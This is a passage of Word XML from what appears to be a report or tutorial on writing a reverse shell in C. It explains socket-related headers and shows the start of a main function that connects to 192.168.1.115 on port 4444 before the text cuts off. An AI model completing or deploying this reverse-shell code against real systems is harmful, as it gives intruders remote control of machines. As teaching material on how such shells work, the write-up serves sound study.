        <w:t>#include &lt;sys/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>socket.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1463B360" w14:textId="77777777" w:rsidR="009411D4" w:rsidRPr="009411D4" w:rsidRDefault="009411D4" w:rsidP="00534FD2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>#include &lt;sys/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>types.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE5255E" w14:textId="77777777" w:rsidR="009411D4" w:rsidRPr="009411D4" w:rsidRDefault="009411D4" w:rsidP="00534FD2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>stdlib.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D76988" w14:textId="77777777" w:rsidR="009411D4" w:rsidRPr="009411D4" w:rsidRDefault="009411D4" w:rsidP="00534FD2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>unistd.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F84CD6" w14:textId="77777777" w:rsidR="009411D4" w:rsidRPr="009411D4" w:rsidRDefault="009411D4" w:rsidP="00534FD2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>netinet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>in.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686B71B8" w14:textId="015FEBE7" w:rsidR="009411D4" w:rsidRDefault="009411D4" w:rsidP="00534FD2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>arpa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>inet.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009411D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E9AE38" w14:textId="77777777" w:rsidR="005A747B" w:rsidRPr="009411D4" w:rsidRDefault="005A747B" w:rsidP="00534FD2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55B1469C" w14:textId="1C248B14" w:rsidR="00755FFF" w:rsidRPr="00AB26EA" w:rsidRDefault="00322100" w:rsidP="004E030A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="005A747B" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>tdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A747B" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="005A747B" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">header </w:t>
      </w:r>
      <w:r w:rsidR="005A747B" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>refers to standard input, output in </w:t>
      </w:r>
      <w:r w:rsidR="005A747B" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="005A747B" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> language in which built in functions like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005A747B" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A747B" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005A747B" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r w:rsidR="005A747B" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00534FD2" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A747B" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>scanf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A747B" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>() are defined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA891B8" w14:textId="3DE6B834" w:rsidR="00322100" w:rsidRPr="00AB26EA" w:rsidRDefault="00322100" w:rsidP="004E030A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sys/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>socket.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00534FD2" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00534FD2" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">header </w:t>
      </w:r>
      <w:r w:rsidR="00957052" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">for including </w:t>
      </w:r>
      <w:r w:rsidR="00141065" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>several</w:t>
      </w:r>
      <w:r w:rsidR="00957052" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> functions and </w:t>
      </w:r>
      <w:r w:rsidR="00534FD2" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>structure</w:t>
      </w:r>
      <w:r w:rsidR="00957052" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>s used when creating sockets</w:t>
      </w:r>
      <w:r w:rsidR="00534FD2" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C54315" w14:textId="2EDA11C4" w:rsidR="00534FD2" w:rsidRPr="00AB26EA" w:rsidRDefault="00534FD2" w:rsidP="004E030A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sys/types – header</w:t>
      </w:r>
      <w:r w:rsidR="00A750B4" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0001026F" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>containing</w:t>
      </w:r>
      <w:r w:rsidR="00A750B4" w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> definitions and data types used in system calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD6E69D" w14:textId="139A651A" w:rsidR="00534FD2" w:rsidRPr="00AB26EA" w:rsidRDefault="00534FD2" w:rsidP="004E030A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>stdlib.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> – general purpose standard library for C programming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25255F5A" w14:textId="3E4BE146" w:rsidR="00534FD2" w:rsidRPr="00AB26EA" w:rsidRDefault="00534FD2" w:rsidP="004E030A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>unistd.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB26EA">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> – defines symbolic constants and types. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440288CD" w14:textId="3A7CB41E" w:rsidR="00327062" w:rsidRDefault="00534FD2" w:rsidP="004E030A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netinet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>in.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – defines constants and structure needed for internet domain addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D16C727" w14:textId="4DE2FE5B" w:rsidR="00471383" w:rsidRDefault="00471383" w:rsidP="00DF7FC7"/>
    <w:p w14:paraId="1844C513" w14:textId="52A59FA4" w:rsidR="00471383" w:rsidRDefault="00471383" w:rsidP="00471383">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc40218014"/>
      <w:r>
        <w:t>Main Function</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="131E37D1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>int main(void</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="09500068" w14:textId="687C7138" w:rsidR="00471383" w:rsidRPr="00B678AC" w:rsidRDefault="00471383" w:rsidP="00471383">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C4117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int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sockt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="05C9E8C0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int port = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>4444;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2DF2B59D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struct </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sockaddr_in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>revsockaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="532E13C9" w14:textId="77777777" w:rsidR="00471383" w:rsidRPr="00B678AC" w:rsidRDefault="00471383" w:rsidP="00471383">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29B9F85D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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sockt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>socket(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>AF_INET, SOCK_STREAM, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E79C24D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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>revsockaddr.sin_family</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> = AF_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>INET;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="001FFEDC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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>revsockaddr.sin_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>htons</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(port</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6680ED33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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>revsockaddr.sin_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>addr.s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>inet_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>("192.168.1.115");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B18AEF8" w14:textId="77777777" w:rsidR="00471383" w:rsidRPr="00B678AC" w:rsidRDefault="00471383" w:rsidP="00471383">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CFD4877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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>connect(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sockt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">, (struct </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sockaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> *) &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>revsockaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B678AC">
        <w:rPr>
          <w:color w:val="FF0000"/>
